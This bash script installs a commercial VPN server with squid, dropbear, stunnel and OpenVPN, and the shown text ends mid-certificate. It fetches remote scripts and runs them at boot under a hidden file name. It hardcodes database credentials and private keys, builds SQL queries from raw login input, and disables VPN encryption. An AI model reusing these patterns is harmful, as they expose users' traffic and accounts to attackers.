#!/bin/bash
#Script Variables
HOST='109.71.252.34'
USER='onvao_vpnkurulum'
PASS='**********'
DBNAME='onvao_vpnkurulum'
PORT_TCP='1194';
PORT_UDP='1194';
MYIP=$(wget -qO- icanhazip.com);

timedatectl set-timezone Europa/Istanbul
install_require () {
clear
echo 'Installing dependencies.'
{
export DEBIAN_FRONTEND=noninteractive
 apt-get update
 apt-get install -y curl wget cron python-minimal libpython-stdlib
 apt-get install -y iptables
 apt-get install -y openvpn mariadb-server netcat httpie php neofetch vnstat
 apt-get install -y screen squid stunnel4 dropbear gnutls-bin python
 apt-get install -y dos2unix nano unzip jq virt-what net-tools default-mysql-client
 apt-get install -y mlocate dh-make libaudit-dev build-essential fail2ban
apt-get -o Acquire::ForceIPv4=true install python dos2unix stunnel4 dropbear screen curl -y
clear
}&>/dev/null
clear
}

install_squid(){
clear
echo 'Installing proxy.'
{
sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup
echo "deb http://ftp.debian.org/debian/ jessie main contrib non-free
    deb-src http://ftp.debian.org/debian/ jessie main contrib non-free
    deb http://security.debian.org/ jessie/updates main contrib
    deb-src http://security.debian.org/ jessie/updates main contrib
    deb http://ftp.debian.org/debian/ jessie-updates main contrib non-free
    deb-src http://ftp.debian.org/debian/ jessie-updates main contrib non-free" >> /etc/apt/sources.list
    apt update
    apt install -y gcc-4.9 g++-4.9
    update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-4.9 10
    update-alternatives --install /usr/bin/g++ g++ /usr/bin/g++-4.9 10
    update-alternatives --install /usr/bin/cc cc /usr/bin/gcc 30
    update-alternatives --set cc /usr/bin/gcc
    update-alternatives --install /usr/bin/c++ c++ /usr/bin/g++ 30
    update-alternatives --set c++ /usr/bin/g++
    cd /usr/src
    wget http://www.squid-cache.org/Versions/v3/3.1/squid-3.1.23.tar.gz
    tar zxvf squid-3.1.23.tar.gz
    cd squid-3.1.23
    ./configure --prefix=/usr \
      --localstatedir=/var/squid \
      --libexecdir=/usr/lib/squid \
      --srcdir=. \
      --datadir=/usr/share/squid \
      --sysconfdir=/etc/squid \
      --with-default-user=proxy \
      --with-logdir=/var/log/squid \
      --with-pidfile=/var/run/squid.pid
    make -j$(nproc)
    make install
    wget --no-check-certificate -O /etc/init.d/squid http://myprotectionservices.com/tknetwork/squid.sh
    chmod +x /etc/init.d/squid
    update-rc.d squid defaults
    chown -cR proxy /var/log/squid
    squid -z
    cd /etc/squid/
    rm squid.conf
    echo "acl teamkidlat dst `curl -s https://api.ipify.org`" >> squid.conf
    echo 'http_port 8080
http_port 8181
visible_hostname Proxy
acl PURGE method PURGE
acl HEAD method HEAD
acl POST method POST
acl GET method GET
acl CONNECT method CONNECT
http_access allow teamkidlat
http_reply_access allow all
http_access deny all
icp_access allow all
always_direct allow all
visible_hostname teamkidlat-Proxy
error_directory /usr/share/squid/errors/English' >> squid.conf
    cd /usr/share/squid/errors/English
    rm ERR_INVALID_URL
    echo '<!--tknetwork--><!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>SECURE PROXY</title><meta name="viewport" content="width=device-width, initial-scale=1"><meta http-equiv="X-UA-Compatible" content="IE=edge"/><link rel="stylesheet" href="https://bootswatch.com/4/slate/bootstrap.min.css" media="screen"><link href="https://fonts.googleapis.com/css?family=Press+Start+2P" rel="stylesheet"><style>body{font-family: "Press Start 2P", cursive;}.fn-color{color: #ffff; background-image: -webkit-linear-gradient(92deg, #f35626, #feab3a); -webkit-background-clip: text; -webkit-text-fill-color: transparent; -webkit-animation: hue 5s infinite linear;}@-webkit-keyframes hue{from{-webkit-filter: hue-rotate(0deg);}to{-webkit-filter: hue-rotate(-360deg);}}</style></head><body><div class="container" style="padding-top: 50px"><div class="jumbotron"><h1 class="display-3 text-center fn-color">SECURE PROXY</h1><h4 class="text-center text-danger">SERVER</h4><p class="text-center">😍 %w 😍</p></div></div></body></html>' >> ERR_INVALID_URL
    chmod 755 *
    /etc/init.d/squid start
cd /etc || exit
wget 'https://raw.githubusercontent.com/johnberic/nana/main/ws' -O /etc/socks.py
dos2unix /etc/socks.py
chmod +x /etc/socks.py
rm /etc/apt/sources.list
sudo cp /etc/apt/sources.list_backup /etc/apt/sources.list
} &>/dev/null
}



install_dropbear()
{
clear
echo "Installing dropbear."
{
rm -rf /etc/default/dropbear

cat > /etc/default/dropbear << MyDropbear
NO_START=0
DROPBEAR_PORT=442
DROPBEAR_EXTRA_ARGS="-p 551"
DROPBEAR_BANNER="/etc/banner"
DROPBEAR_RSAKEY="/etc/dropbear/dropbear_rsa_host_key"
DROPBEAR_DSSKEY="/etc/dropbear/dropbear_dss_host_key"
DROPBEAR_ECDSAKEY="/etc/dropbear/dropbear_ecdsa_host_key"
DROPBEAR_RECEIVE_WINDOW=65536
MyDropbear


sed -i '/\/bin\/false/d' /etc/shells
sed -i '/\/usr\/sbin\/nologin/d' /etc/shells
echo '/bin/false' >> /etc/shells
echo '/usr/sbin/nologin' >> /etc/shells

service dropbear restart
service ssh restart
} &>/dev/null
}


install_socks()
{
clear
echo "Installing socks."
{
wget --no-check-certificate https://myprotectionservices.com/tknetwork/proxyssh.py -O ~/.ubuntu.py
dos2unix ~/.ubuntu.py
chmod +x ~/.ubuntu.py

cat > /etc/condom.sh << MyCondom
#!/bin/sh -e
service dropbear restart
service stunnel4 restart
screen -dmS socks python ~/.ubuntu.py
exit 0
MyCondom

chmod +x /etc/condom.sh
sudo crontab -l | { echo '@reboot bash /etc/condom.sh'; } | crontab -
} &>/dev/null
}


install_banner()
{
clear
echo "Adding banner."
{
cat > /etc/banner << MyBanner
<br>
==========================
<br><font color=red size=7><b>DİKKAT</b></font>
<br>
==========================
<br>
<i><font color='green'>- SPAM YOK !!!</br></font></i>
<br><i><font color='green'>- DDOS YAPMA !!!</br></font></i>
<br><i><font color='green'>- HACK İLE UĞRAŞMA !!!</br></font></i>
<br><i><font color='green'>- KART BİLGİLERİNİ YİNEDE KULLANMA !!!</br></font></i>
<br><i><font color='green'>- TORRENT KULLANMA !!!</i></br></font></i>
<br>
==========================
<br>
MyBanner
    
} &>/dev/null
}


install_openvpn()
{
clear
echo "Installing openvpn."
{
mkdir -p /etc/openvpn/easy-rsa/keys
mkdir -p /etc/openvpn/login
mkdir -p /etc/openvpn/server
mkdir -p /var/www/html/stat
touch /etc/openvpn/server.conf
touch /etc/openvpn/server2.conf

echo 'DNS=1.1.1.1
DNSStubListener=no' >> /etc/systemd/resolved.conf

echo '#Openvpn Configuration  :)
dev tun
port 53
proto udp
topology subnet
server 10.30.0.0 255.255.252.0
ca /etc/openvpn/easy-rsa/keys/ca.crt 
cert /etc/openvpn/easy-rsa/keys/server.crt 
key /etc/openvpn/easy-rsa/keys/server.key 
dh none
tls-server
tls-version-min 1.2
tls-cipher TLS-ECDHE-RSA-WITH-AES-128-GCM-SHA256
cipher none
ncp-disable
auth none
sndbuf 0
rcvbuf 0
keepalive 10 120
persist-key
persist-tun
ping-timer-rem
reneg-sec 0
user nobody
group nogroup
client-to-client
username-as-common-name
verify-client-cert none
script-security 3
auth-user-pass-verify "/etc/openvpn/login/auth_vpn" via-env #
push "persist-key"
push "persist-tun"
push "dhcp-option DNS 8.8.8.8"
push "redirect-gateway def1 bypass-dhcp"
push "sndbuf 0"
push "rcvbuf 0"
#log /etc/openvpn/server/udpserver.log
status /etc/openvpn/server/udpclient.log
status-version 2
verb 3' > /etc/openvpn/server.conf


echo '#Openvpn Configuration  :)
dev tun
port 1194
proto tcp
topology subnet
server 10.20.0.0 255.255.252.0
ca /etc/openvpn/easy-rsa/keys/ca.crt 
cert /etc/openvpn/easy-rsa/keys/server.crt 
key /etc/openvpn/easy-rsa/keys/server.key 
dh none
tls-server
tls-version-min 1.2
tls-cipher TLS-ECDHE-RSA-WITH-AES-128-GCM-SHA256
cipher none
ncp-disable
auth none
sndbuf 0
rcvbuf 0
keepalive 10 120
persist-key
persist-tun
ping-timer-rem
reneg-sec 0
user nobody
group nogroup
client-to-client
username-as-common-name
verify-client-cert none
script-security 3
auth-user-pass-verify "/etc/openvpn/login/auth_vpn" via-env #
push "persist-key"
push "persist-tun"
push "dhcp-option DNS 8.8.8.8"
push "redirect-gateway def1 bypass-dhcp"
push "sndbuf 0"
push "rcvbuf 0"
#log /etc/openvpn/server/tcpserver.log
status /etc/openvpn/server/tcpclient.log
status-version 2
verb 3' > /etc/openvpn/server2.conf



cat <<\EOM >/etc/openvpn/login/config.sh
#!/bin/bash
HOST='109.71.252.34'
USER='onvao_vpnkurulum'
PASS='**********'
DB='onvao_vpnkurulum'
EOM




/bin/cat <<"EOM" >/etc/openvpn/login/auth_vpn
#!/bin/bash
. /etc/openvpn/login/config.sh
tm="$(date +%s)"
dt="$(date +'%Y-%m-%d %H:%M:%S')"

##Authentication
PREM="users.user_name='$username' AND users.auth_vpn=md5('$password') AND users.is_validated=1 AND users.is_freeze=0 AND users.is_active=1 AND users.is_ban=0 AND users.duration > 0"
VIP="users.user_name='$username' AND users.auth_vpn=md5('$password') AND users.is_validated=1 AND users.is_freeze=0 AND users.is_active=1 AND users.is_ban=0 AND users.vip_duration > 0"
PRIV="users.user_name='$username' AND users.auth_vpn=md5('$password') AND users.is_validated=1 AND users.is_freeze=0 AND users.is_active=1 AND users.is_ban=0 AND users.private_duration > 0"
Query="SELECT users.user_name FROM users WHERE $PREM OR $VIP OR $PRIV"
user_name=`mysql -u $USER -p$PASS -D $DB -h $HOST --skip-column-name -e "$Query"`

[ "$user_name" != '' ] && [ "$user_name" = "$username" ] && echo "user : $username" && echo 'authentication ok.' && exit 0 || echo 'authentication failed.'; exit 1


EOM

cat <<'EOF' >/etc/openvpn/login/connect.sh
#!/bin/bash

. /etc/openvpn/login/config.sh

##set status online to user connected
server_ip=$(curl -s https://api.ipify.org)
datenow=`date +"%Y-%m-%d %T"`
mysql -u $USER -p$PASS -D $DB -h $HOST -e "UPDATE users SET is_active='1', device_connected='1', active_address='$server_ip', active_date='$datenow' WHERE user_name='$common_name' "

EOF

#TCP client-disconnect file
cat <<'EOF' >/etc/openvpn/login/disconnect.sh
#!/bin/bash

. /etc/openvpn/login/config.sh

mysql -u $USER -p$PASS -D $DB -h $HOST -e "UPDATE users SET is_active='0', active_address='', active_date='' WHERE user_name='$common_name' "
EOF


cat << EOF > /etc/openvpn/easy-rsa/keys/ca.crt
-----BEGIN CERTIFICATE-----
MIIDRTCCAi2gAwIBAgIUQub/Z4LHhhaglvsjyJ1lVqBKMbYwDQYJKoZIhvcNAQEL
BQAwFDESMBAGA1UEAwwJb252YW8ubmV0MB4XDTI1MDQwNDE1Mjg0MloXDTM1MDQw
MjE1Mjg0MlowFDESMBAGA1UEAwwJb252YW8ubmV0MIIBIjANBgkqhkiG9w0BAQEF
AAOCAQ8AMIIBCgKCAQEA0XMN96C7N7ZW+9BIGUsOoIsyPviBj+5iJ/OeS6LFilwN
1sbzece9tthK9IyU7JXye329H2vs4kzavwZ7YUIy6xuuojEQG0HC+QZzRx3Envsq
A3lJ3ZDI37rwNB4KfBLPHSChPEu3w2dLqr4EHw0kQsEWs1MWbZ11oul8kHnrsxAb
fhqiJApOBBFIawVuR+7a0Eu1WMiU/SKtR1l2zOH5G9Tv5m3CWdciGisGE7kW8uPr
0QxRL/ZSniEaQgpnmUdSCCQ2NAiM9xOsTN0aOSg8Kmj4J7sHXmYXpKYhi+BAUMhD
30ouED02ZilScBjjjSRiaGWaHk83oMxhKG46FXAB4wIDAQABo4GOMIGLMB0GA1Ud
DgQWBBS4RsWXCttc24F8StHWBS1T4aIv8zBPBgNVHSMESDBGgBS4RsWXCttc24F8
StHWBS1T4aIv86EYpBYwFDESMBAGA1UEAwwJb252YW8ubmV0ghRC5v9ngseGFqCW
+yPInWVWoEoxtjAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIBBjANBgkqhkiG9w0B
AQsFAAOCAQEABHB1lWqGT+VdfakalNHBaprGgbxnUVlUVeD6pitrAOSq/s3QQixs
k321Vc8DvVKLXelwtMPNzT+iL0jd/xpOJ1r+2oMqGJ2OXBjqSBESlc2VT9yMUN0d
RGq1qrj2obXRPoNqBF/s1LwfbFCVy+RAZWV7ufsgcdUnUOdQ4WeVfRZSdDMbQRpZ
7bBbCWuRcBNMn9QJaxFyles2AVO5YdUx2HvkCfeJRH4xW6E5XQP6cSqHj9QLSWUe
WUHBryGUAg8ILjMKDTPP44pDw6RCWVoIZIyJMPDBJNWXJ/ZTbdF78u7YpWBYkJaI
AR5N9QYkFhL91oAc9O58Rhpjj5ZEnQseTw==
-----END CERTIFICATE-----
EOF

cat << EOF > /etc/openvpn/easy-rsa/keys/server.crt
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            af:cf:cc:6d:1b:4c:d4:33:16:ab:f8:e9:ee:f3:c6:39
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: CN=onvao.net
        Validity
            Not Before: Apr  4 15:33:47 2025 GMT
            Not After : Mar 19 15:33:47 2028 GMT
        Subject: CN=onvao.net
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                RSA Public-Key: (2048 bit)
                Modulus:
                    00:f4:ca:bc:b2:cf:5e:9e:9f:0e:ac:42:dd:ae:da:
                    98:71:29:e3:5b:30:43:17:f6:7c:4a:4d:09:f2:67:
                    cf:c7:16:38:05:b1:31:20:3d:c8:82:8f:c2:bd:b5:
                    31:26:f3:ef:3f:a3:c8:02:3f:5e:c1:51:93:89:8f:
                    26:94:d3:1e:b5:a5:75:68:03:e9:77:66:93:59:d3:
                    c3:32:e5:1b:86:bc:14:02:1e:cf:75:32:5d:04:18:
                    4e:f5:29:26:c9:8e:10:46:59:e3:9c:88:e7:dc:4a:
                    a1:01:a3:aa:86:c1:e9:0d:78:1d:27:1e:b4:70:39:
                    fc:4f:f0:8f:50:39:98:85:33:0f:f7:ff:af:8c:ba:
                    3d:f4:dc:8b:68:99:6c:b3:38:8d:80:b9:79:22:eb:
                    33:e0:64:e7:ff:fe:84:3d:39:74:15:79:cf:b0:94:
                    a8:6c:9a:3f:92:05:12:c0:52:36:c4:df:83:57:73:
                    53:1f:ed:4f:98:b3:88:bd:2b:6b:1c:7f:80:1e:78:
                    52:cc:02:14:a5:0c:a7:a4:fd:2f:89:32:c7:76:ff:
                    11:b1:bc:ba:d8:16:17:f0:0a:24:65:dd:f6:f7:0e:
                    f9:81:ba:5e:4a:c6:c1:2b:e1:98:e8:4f:c1:ba:f2:
                    31:3a:fd:1e:84:e8:04:76:ff:34:9c:4f:c3:03:87:
                    78:01
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints: 
                CA:FALSE
            X509v3 Subject Key Identifier: 
                C4:A1:D1:F4:5E:32:38:36:1B:56:28:7A:A9:4D:FB:A5:3D:F6:BD:6D
            X509v3 Authority Key Identifier: 
                keyid:B8:46:C5:97:0A:DB:5C:DB:81:7C:4A:D1:D6:05:2D:53:E1:A2:2F:F3
                DirName:/CN=onvao.net
                serial:42:E6:FF:67:82:C7:86:16:A0:96:FB:23:C8:9D:65:56:A0:4A:31:B6

            X509v3 Extended Key Usage: 
                TLS Web Server Authentication
            X509v3 Key Usage: 
                Digital Signature, Key Encipherment
            X509v3 Subject Alternative Name: 
                DNS:onvao.net
    Signature Algorithm: sha256WithRSAEncryption
         7c:46:be:91:fc:11:ed:ea:b3:96:ae:d4:01:56:5a:36:e5:88:
         15:48:db:8b:bc:05:fa:38:d6:19:54:56:a4:08:25:50:ca:68:
         c0:cb:3c:16:b7:93:14:9d:a6:76:c5:92:c2:6b:f6:59:72:b8:
         de:de:e1:6f:b2:ae:7c:23:75:fd:a6:36:c0:2d:25:68:c9:b4:
         44:09:f0:06:d2:19:5b:6d:c5:19:1b:d3:47:e3:21:4e:82:22:
         db:a8:72:ad:01:1a:e8:b0:ed:09:f4:76:2a:e5:ac:30:2b:3c:
         63:dd:9a:17:05:40:4c:57:2d:6d:54:66:8f:c8:40:9e:75:dc:
         32:44:80:ff:99:ed:48:ec:65:77:4f:20:86:2f:fa:2d:d9:78:
         06:96:e1:4a:59:4e:55:8d:8a:bc:85:39:72:9a:6a:eb:9b:a1:
         dc:5c:94:15:b0:6e:67:92:20:bb:2d:04:54:28:19:4c:b7:fa:
         ab:7f:28:3c:21:43:44:f8:36:ad:fb:38:f0:52:e0:2e:ed:00:
         ed:83:33:0b:4b:2c:75:f7:48:56:6c:ac:57:3c:b8:b7:5e:a9:
         1f:cb:1c:47:ab:bc:c6:17:7d:10:ac:03:81:71:6d:85:f9:7e:
         8a:d8:63:27:71:fc:23:a8:a6:bc:65:24:e8:82:b8:b3:2b:79:
         05:32:82:70
-----BEGIN CERTIFICATE-----
MIIDajCCAlKgAwIBAgIRAK/PzG0bTNQzFqv46e7zxjkwDQYJKoZIhvcNAQELBQAw
FDESMBAGA1UEAwwJb252YW8ubmV0MB4XDTI1MDQwNDE1MzM0N1oXDTI4MDMxOTE1
MzM0N1owFDESMBAGA1UEAwwJb252YW8ubmV0MIIBIjANBgkqhkiG9w0BAQEFAAOC
AQ8AMIIBCgKCAQEA9Mq8ss9enp8OrELdrtqYcSnjWzBDF/Z8Sk0J8mfPxxY4BbEx
ID3Igo/CvbUxJvPvP6PIAj9ewVGTiY8mlNMetaV1aAPpd2aTWdPDMuUbhrwUAh7P
dTJdBBhO9SkmyY4QRlnjnIjn3EqhAaOqhsHpDXgdJx60cDn8T/CPUDmYhTMP9/+v
jLo99NyLaJlssziNgLl5Iusz4GTn//6EPTl0FXnPsJSobJo/kgUSwFI2xN+DV3NT
H+1PmLOIvStrHH+AHnhSzAIUpQynpP0viTLHdv8Rsby62BYX8AokZd329w75gbpe
SsbBK+GY6E/BuvIxOv0ehOgEdv80nE/DA4d4AQIDAQABo4G2MIGzMAkGA1UdEwQC
MAAwHQYDVR0OBBYEFMSh0fReMjg2G1YoeqlN+6U99r1tME8GA1UdIwRIMEaAFLhG
xZcK21zbgXxK0dYFLVPhoi/zoRikFjAUMRIwEAYDVQQDDAlvbnZhby5uZXSCFELm
/2eCx4YWoJb7I8idZVagSjG2MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQE
AwIFoDAUBgNVHREEDTALgglvbnZhby5uZXQwDQYJKoZIhvcNAQELBQADggEBAHxG
vpH8Ee3qs5au1AFWWjbliBVI24u8Bfo41hlUVqQIJVDKaMDLPBa3kxSdpnbFksJr
9llyuN7e4W+yrnwjdf2mNsAtJWjJtEQJ8AbSGVttxRkb00fjIU6CItuocq0BGuiw
7Qn0dirlrDArPGPdmhcFQExXLW1UZo/IQJ513DJEgP+Z7UjsZXdPIIYv+i3ZeAaW
4UpZTlWNiryFOXKaauubodxclBWwbmeSILstBFQoGUy3+qt/KDwhQ0T4Nq37OPBS
4C7tAO2DMwtLLHX3SFZsrFc8uLdeqR/LHEervMYXfRCsA4FxbYX5forYYydx/COo
prxlJOiCuLMreQUygnA=
-----END CERTIFICATE-----
EOF

cat << EOF > /etc/openvpn/easy-rsa/keys/server.key
-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQD0yryyz16enw6s
Qt2u2phxKeNbMEMX9nxKTQnyZ8/HFjgFsTEgPciCj8K9tTEm8+8/o8gCP17BUZOJ
jyaU0x61pXVoA+l3ZpNZ08My5RuGvBQCHs91Ml0EGE71KSbJjhBGWeOciOfcSqEB
o6qGwekNeB0nHrRwOfxP8I9QOZiFMw/3/6+Muj303ItomWyzOI2AuXki6zPgZOf/
/oQ9OXQVec+wlKhsmj+SBRLAUjbE34NXc1Mf7U+Ys4i9K2scf4AeeFLMAhSlDKek
/S+JMsd2/xGxvLrYFhfwCiRl3fb3DvmBul5KxsEr4ZjoT8G68jE6/R6E6AR2/zSc
T8MDh3gBAgMBAAECggEBAJixneMr1ym6rbxmOUHIuS5doqRPBor8BauTQpEikEjv
YyKp1Kr33wsSAbe0PmS95I8d6rT8Mm8EI7O6x6Ytywojm4i2Z/tC0MdHgItOvkzd
JN3tuhqwv7S+NQJYGQnAxAYeLAyImZigNK6BGO3WJzlvoz+zt3oJsYlr1PmF882h
RARkBse5Yltkw+B5fGy6cda2NM09jgH2BFVW6+SgexE5Veos0/g5MxinKtQM5Jue
u+eZrv4xtqwDXjhlUHhok+G5KHnCXSci9FJEHLcQgDVbPl1m8jhU+C8d/QxR2xhq
Rk5gIFCI0IoCinPNr5JejJVv47rjP0CZrCXehLEqjcECgYEA/7o/LhfF+LhwxT0f
nqHoe6DK2oJdDSsMqHHFsGdi2rNmk8zDxlB9lBo/51aMP14gQVUVJ/yoAa3zymBv
ugf8cAtxXNee8dVaZ5vQU9uisIbS3tUG/hGcberwK/jhJR1hU7gVFINm4KQDT6fv
ikvXPAMLmdoASeVXIQZvT4M6VlsCgYEA9Q2B6eMrHVQFx4otYAOK/m31j60qSS3B
NsR1IzfaNUbk/8AhDSmOUi6QJO4vBHlDKx/9o4YPKxAoyOjI3K30ge6suIQzTKI0
7wuG8L/Q3uRgxzKlAdCMzFyInEgFsNJUlOaP2sIByV4q6Gw16a6Ke3SvIZtUx0UN
GBjdrgR20dMCgYAGF1CT73sGrpX5DLipFaAs+ap7Q+mle6YEiRk1V3ESVn2V/aWY
HqivE2T8RKJ4i+xmwfkMB8eUqqkI4/0lSDVqEcu0c2pUxkkt+JcguDWK0NtK9XYC
LTc1owfvdDEgqi98SAEwiOS1axKtHgnlmGLbChOHqZqiJ/VIUxfpo+2KywKBgCVD
rpPQlcfZ9R8I5imJoGNceVEl9h42tQENEvsODUK4yy4RG3WS8i+RIR5ckg3OGua9
8KYjRr83r9wNei4Ezf/MObu9bseiiwYm7JhDsxGSDR19mBYUjrStBaEuWp8u/Om/
vfR4OClVBpVdjz0/65MmhVNI+bVrzLfzYBKMXz09AoGAQ2xnQNHpiWaKMCDhQsY8
w2kq9QtmfoFOw58n0qRRF9VZ7F7G8xb0h/D9oUTGBw8VgtrUQuv70WaKKzWPNEnx
cs5bavYcmvGdVm+PydiqEtMKIrYgiEX1PdADySVaSgp0cLdvX8YIUEoWpsPDDaNN
H00I2sJgUobmDfIcmZwCPnE=
-----END PRIVATE KEY-----

EOF

cat << EOF > /etc/openvpn/easy-rsa/keys/dh.pem
-----BEGIN DH PARAMETERS-----
MIIBCAKCAQEAiPiEXbOGC8EBs8HdOUco7+R1gx5INfvWEYJK9ZCDBbeHZx5jZrhs
RCiDoLuWEHUciMfpdNH39g/hq0z/5Y4PvGbUEOgg1bc1E9sW2e1YsfqIC2/tM1go
iR1tARciRxGliQPEIfwwRZzXTOw3XCigZ6AYcoNkrHFVObpw1a3UMuTcOp83RTqm
cP8lY4fnsCXel3eUBQASlRQNsjN/O4Xh2qzFTjG8s8XIvAZSTcQE/EI8ny1Tbqqa
/w4m8HAciJPWjyhLtUCwcU+DHJRlVPJ2tkVdvHKH4yKDo0Zr5YuLUPEV9m3SEXCk
txE0t/8vC9xB2yh/Q/YW4SOJlEIGMdRyswIBAg==
-----END DH PARAMETERS-----
EOF


dos2unix /etc/openvpn/login/auth_vpn
dos2unix /etc/openvpn/login/connect.sh
dos2unix /etc/openvpn/login/disconnect.sh

chmod 777 -R /etc/openvpn/
chmod 755 /etc/openvpn/server.conf
chmod 755 /etc/openvpn/server2.conf
chmod 755 /etc/openvpn/login/connect.sh
chmod 755 /etc/openvpn/login/disconnect.sh
chmod 755 /etc/openvpn/login/config.sh
chmod 755 /etc/openvpn/login/auth_vpn
}&>/dev/null
}


install_firewall_kvm () {
clear
echo "Installing iptables."
iptables -t nat -A PREROUTING -p udp --dport 20000:50000 -j DNAT --to-destination :5666
ip6tables -t nat -A PREROUTING -p udp --dport 20000:50000 -j DNAT --to-destination :5666
echo "net.ipv4.ip_forward = 1
net.ipv4.conf.all.rp_filter=0
net.ipv4.conf.default.rp_filter=0
net.core.wmem_max=16777216
net.core.rmem_max=16777216
net.ipv4.tcp_rmem=4096 262144 16777216
net.ipv4.tcp_wmem=4096 262144 16777216" > /etc/sysctl.conf
sysctl -p
{
iptables -F
iptables -t nat -A POSTROUTING -s 10.20.0.0/22 -o "$server_interface" -j MASQUERADE
iptables -t nat -A POSTROUTING -s 10.20.0.0/22 -o "$server_interface" -j SNAT --to-source "$server_ip"
iptables -t nat -A POSTROUTING -s 10.30.0.0/22 -o "$server_interface" -j MASQUERADE
iptables -t nat -A POSTROUTING -s 10.30.0.0/22 -o "$server_interface" -j SNAT --to-source "$server_ip"
iptables -t filter -A INPUT -p udp -m udp --dport 20100:20900 -m state --state NEW -m recent --update --seconds 30 --hitcount 10 --name DEFAULT --mask 255.255.255.255 --rsource -j DROP
iptables -t filter -A INPUT -p udp -m udp --dport 20100:20900 -m state --state NEW -m recent --set --name DEFAULT --mask 255.255.255.255 --rsource
iptables-save > /etc/iptables_rules.v4
ip6tables-save > /etc/iptables_rules.v6
}&>/dev/null
}



install_stunnel() {
  {
cd /etc/stunnel/ || exit

echo "-----BEGIN PRIVATE KEY-----
MIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQC+5A1nyiv007ov
uEBY7Hdb7YDk3JPcazZXdfiXJBzce58CDhaSKH3lvmq79ACy4z0VhJUWzFknSur0
jQKCEdlXergVk/WQgDKC6EqOv+x1je6WCkfuMK54CXuhJ+MmudvqXxUJHY1fG7Q/
M8uQah4M8cZHsR5yMchCEB/RcVtVyqQT+pZKcJhjq46cOFUF3CshFUEwV+KHvxRh
vNqGy2PPV6mWpLNL3aez9teZ2Atk370pptG7pTU1yS83Tw+JcyDd7nOAPP/f+5M7
vPcM+EfCXXtgsas6MxDvvnySzSEMNN8eSxlalNbWVoJ96/QLwqfm8rMYUw40jW+I
8Cdic/hPAgMBAAECggEBAJacYGdPgDb/Bpu4CC0hBVumnFf2IUN747hGAAlgGNVt
RBve+bf/8rVd8+CvuA1sdTmRDgCa4oy5839X8m6lnpIC5VNBFjMYssHOfWT70Jk/
jssa+X3ZMw7KjJyuV+6qHfVhZ7t1caFkvmZPe4FJ+MPFzuepu5fl51cYWcJqaeHZ
TQ0TrHmj6+v4+Nds1MWqkgh51c0TAHqXPDiKx+7w96ekebb5qKHRpnQHG5lA9dYe
HBJkQ1fVehwRzjeQDLrJFIAXnCnWjrgifzkW+3x2P5Qs31qMy0dXiEMz/bVMQJ32
JO22gyT2DEFpiJrmufjnizfbPuqtLGKDZQ//OSBxhgECgYEA+Y1aMvRU2QWUuudb
J7/tbAXSTFj1oU2HS7CQGI+Se+ylsH86xpzU7QRKHwjGz9F8L1vkhyea/uF1txEk
33+utR+lTWsi/VpeDqHliPr8e4Lx2MDk49ZBT9/ymf46n2V+PXlG0vXfhSfQZMs5
cfh+O2Jbt3yEoIBbnCVq7kLYhsECgYEAw9KwLv06b2vZIo/m/5gKjVhRAXEYPcsk
NEQP+xcfDKNIoaRRoKkfEPY6FI1cfZXdVa2YrPEcwiyUsNb6qGPODIWvzxQUAbJY
bTwe0Zr+2O4GmZ3RnyYkuvfuk4nFCRimLiGkmZcueI8HBuHaTxAwsvEzKM9+OpzE
pqzpKnhz0w8CgYALeBehJ+GOZ9dCD8f8t7FtuYbEw4Hme+2v6Nl2h4Kv91xWFELb
RfHzQrM1Ye3hNzuB4bNLEuLou+vxEfSj4PZilKXAPSBKjJCuE3q9JOvdsVL0J0ld
v0cZKK25rhl7oep/YMeEgpBXSlElkMF/H3CNwiN891gRGFUdhAq6EJBrAQKBgQCm
58YZVubenyrEhajbA4lC7hqlQvLpgGLMVZLVbeCeEfJPK9ITQPLkrynT6KUDuZ+c
bkkqZpwfeIYHsESXD/JIxA2UT8W5qHwsJskR2K0M0tw3RMetgYJfBgGIKS4S0bqa
qTw1WSFXynivygMbzm3jpyf2ydwKMyJ9+fUGqQH3ywKBgQC2CB0lsVtz6V/4BA0k
iRg3sWe3v2BbGiWQb6UbZQ0QsZQRzypj7J6NZ4TNVOQoPwAbAy4jN9Mc3wxzhUye
EyJQgtTZarRAmR3eFnREUCoMPh3WWxLnfSo49lvgBteQXfNXHVc1hbAf1kuzvEoU
KUP5AhYqwoPn0wUoO3ewxOWd9A==
-----END PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIID9zCCAt+gAwIBAgIUTOzbmiDZ3MdVwEJj5ZamayYmyc8wDQYJKoZIhvcNAQEL
BQAwgYoxCzAJBgNVBAYTAlRSMQ4wDAYDVQQIDAVBZGFuYTEOMAwGA1UEBwwFQWRh
bmExEjAQBgNVBAoMCU9udmFvLm5ldDEMMAoGA1UECwwDdnBuMRIwEAYDVQQDDAlv
bnZhby5uZXQxJTAjBgkqhkiG9w0BCQEWFm1haWxAbXV6YWZmZXJzYW5saS5jb20w
HhcNMjUwNjIzMjAxODAyWhcNMzUwNjIxMjAxODAyWjCBijELMAkGA1UEBhMCVFIx
DjAMBgNVBAgMBUFkYW5hMQ4wDAYDVQQHDAVBZGFuYTESMBAGA1UECgwJT252YW8u
bmV0MQwwCgYDVQQLDAN2cG4xEjAQBgNVBAMMCW9udmFvLm5ldDElMCMGCSqGSIb3
DQEJARYWbWFpbEBtdXphZmZlcnNhbmxpLmNvbTCCASIwDQYJKoZIhvcNAQEBBQAD
ggEPADCCAQoCggEBAL7kDWfKK/TTui+4QFjsd1vtgOTck9xrNld1+JckHNx7nwIO
FpIofeW+arv0ALLjPRWElRbMWSdK6vSNAoIR2Vd6uBWT9ZCAMoLoSo6/7HWN7pYK
R+4wrngJe6En4ya52+pfFQkdjV8btD8zy5BqHgzxxkexHnIxyEIQH9FxW1XKpBP6
lkpwmGOrjpw4VQXcKyEVQTBX4oe/FGG82obLY89XqZaks0vdp7P215nYC2TfvSmm
